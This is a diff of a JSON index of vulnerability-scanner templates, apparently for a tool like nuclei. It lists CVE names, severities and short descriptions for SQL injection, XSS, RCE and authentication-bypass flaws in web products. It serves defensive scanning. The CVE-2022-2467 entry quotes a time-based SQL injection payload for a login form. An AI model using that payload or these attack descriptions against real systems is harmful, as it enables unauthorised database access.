-{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop Ap Pagebuilder \u003c= 2.4.4 SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"}
+{"ID":"CVE-2022-22897","Info":{"Name":"PrestaShop AP Pagebuilder \u003c= 2.4.4 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22897.yaml"}
{"ID":"CVE-2022-2290","Info":{"Name":"Trilium \u003c0.52.4 - Cross-Site Scripting","Severity":"medium","Description":"Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2290.yaml"}
{"ID":"CVE-2022-22947","Info":{"Name":"Spring Cloud Gateway Code Injection","Severity":"critical","Description":"Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22947.yaml"}
{"ID":"CVE-2022-22954","Info":{"Name":"VMware Workspace ONE Access - Server-Side Template Injection","Severity":"critical","Description":"VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22954.yaml"}
@@ -1675,6 +1679,7 @@
{"ID":"CVE-2022-24288","Info":{"Name":"Apache Airflow OS Command Injection","Severity":"high","Description":"Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-24288.yaml"}
{"ID":"CVE-2022-24384","Info":{"Name":"SmarterTools SmarterTrack - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24384.yaml"}
{"ID":"CVE-2022-2462","Info":{"Name":"WordPress Transposh \u003c=1.0.8.1 - Information Disclosure","Severity":"medium","Description":"WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2462.yaml"}
+{"ID":"CVE-2022-24627","Info":{"Name":"AudioCodes Device Manager Express - SQL Injection","Severity":"critical","Description":"An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24627.yaml"}
{"ID":"CVE-2022-2467","Info":{"Name":"Garage Management System 1.0 - SQL Injection","Severity":"critical","Description":"Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2467.yaml"}
{"ID":"CVE-2022-24681","Info":{"Name":"ManageEngine ADSelfService Plus \u003c6121 - Stored Cross-Site Scripting","Severity":"medium","Description":"ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24681.yaml"}
{"ID":"CVE-2022-24716","Info":{"Name":"Icinga Web 2 - Arbitrary File Disclosure","Severity":"high","Description":"Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24716.yaml"}
@@ -1827,6 +1832,7 @@
{"ID":"CVE-2022-34094","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34094.yaml"}
{"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34121.yaml"}
{"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34328.yaml"}
+{"ID":"CVE-2022-34534","Info":{"Name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","Severity":"high","Description":"Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34534.yaml"}
{"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Improper Access Control","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34576.yaml"}
{"ID":"CVE-2022-34590","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-34590.yaml"}
{"ID":"CVE-2022-34753","Info":{"Name":"SpaceLogic C-Bus Home Controller \u003c=1.31.460 - Remote Command Execution","Severity":"high","Description":"SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-34753.yaml"}
@@ -2012,10 +2018,12 @@
{"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"}
{"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"}
{"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"}
+{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"critical","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"}
{"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"}
{"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"}
{"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"}
{"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"}
+{"ID":"CVE-2023-2059","Info":{"Name":"DedeCMS 5.7.87 - Directory Traversal","Severity":"medium","Description":"Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2059.yaml"}
{"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"}
{"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"}
{"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"}
@@ -2025,6 +2033,7 @@
{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"}
{"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"}
{"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"}
+{"ID":"CVE-2023-2227","Info":{"Name":"Modoboa \u003c 2.1.0 - Improper Authorization","Severity":"critical","Description":"Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-2227.yaml"}
{"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"}
{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"}
{"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"}
@@ -2073,6 +2082,7 @@
{"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"}
{"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"}
{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"}
+{"ID":"CVE-2023-27032","Info":{"Name":"PrestaShop AdvancedPopupCreator - SQL Injection","Severity":"critical","Description":"In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27032.yaml"}
{"ID":"CVE-2023-27034","Info":{"Name":"Blind SQL injection vulnerability in Jms Blog","Severity":"critical","Description":"The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27034.yaml"}
{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"high","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"}
{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"high","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"}
@@ -2103,10 +2113,13 @@
{"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"}
{"ID":"CVE-2023-29357","Info":{"Name":"Microsoft SharePoint - Authentication Bypass","Severity":"critical","Description":"Microsoft SharePoint Server Elevation of Privilege Vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29357.yaml"}
{"ID":"CVE-2023-29439","Info":{"Name":"FooGallery plugin \u003c= 2.2.35 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin \u003c= 2.2.35 versions.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29439.yaml"}
-{"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"}
+{"ID":"CVE-2023-2948","Info":{"Name":"OpenEMR \u003c 7.0.1 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2948.yaml"}
+{"ID":"CVE-2023-29489","Info":{"Name":"cPanel \u003c 11.109.9999.116 - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"}
+{"ID":"CVE-2023-2949","Info":{"Name":"OpenEMR \u003c 7.0.1 - Cross-site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2949.yaml"}
{"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"}
{"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"}
{"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"}
+{"ID":"CVE-2023-29827","Info":{"Name":"Embedded JavaScript(EJS) 3.1.6 - Template Injection","Severity":"critical","Description":"ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29827.yaml"}
{"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"}
{"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"critical","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"}
{"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"medium","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"}
@@ -2120,12 +2133,15 @@
{"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"}
{"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"}
{"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"}
+{"ID":"CVE-2023-3077","Info":{"Name":"MStore API \u003c 3.9.8 - SQL Injection","Severity":"critical","Description":"The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3077.yaml"}
{"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"}
{"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"}
{"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"}
{"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"}
+{"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"}
{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
+{"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"}
{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
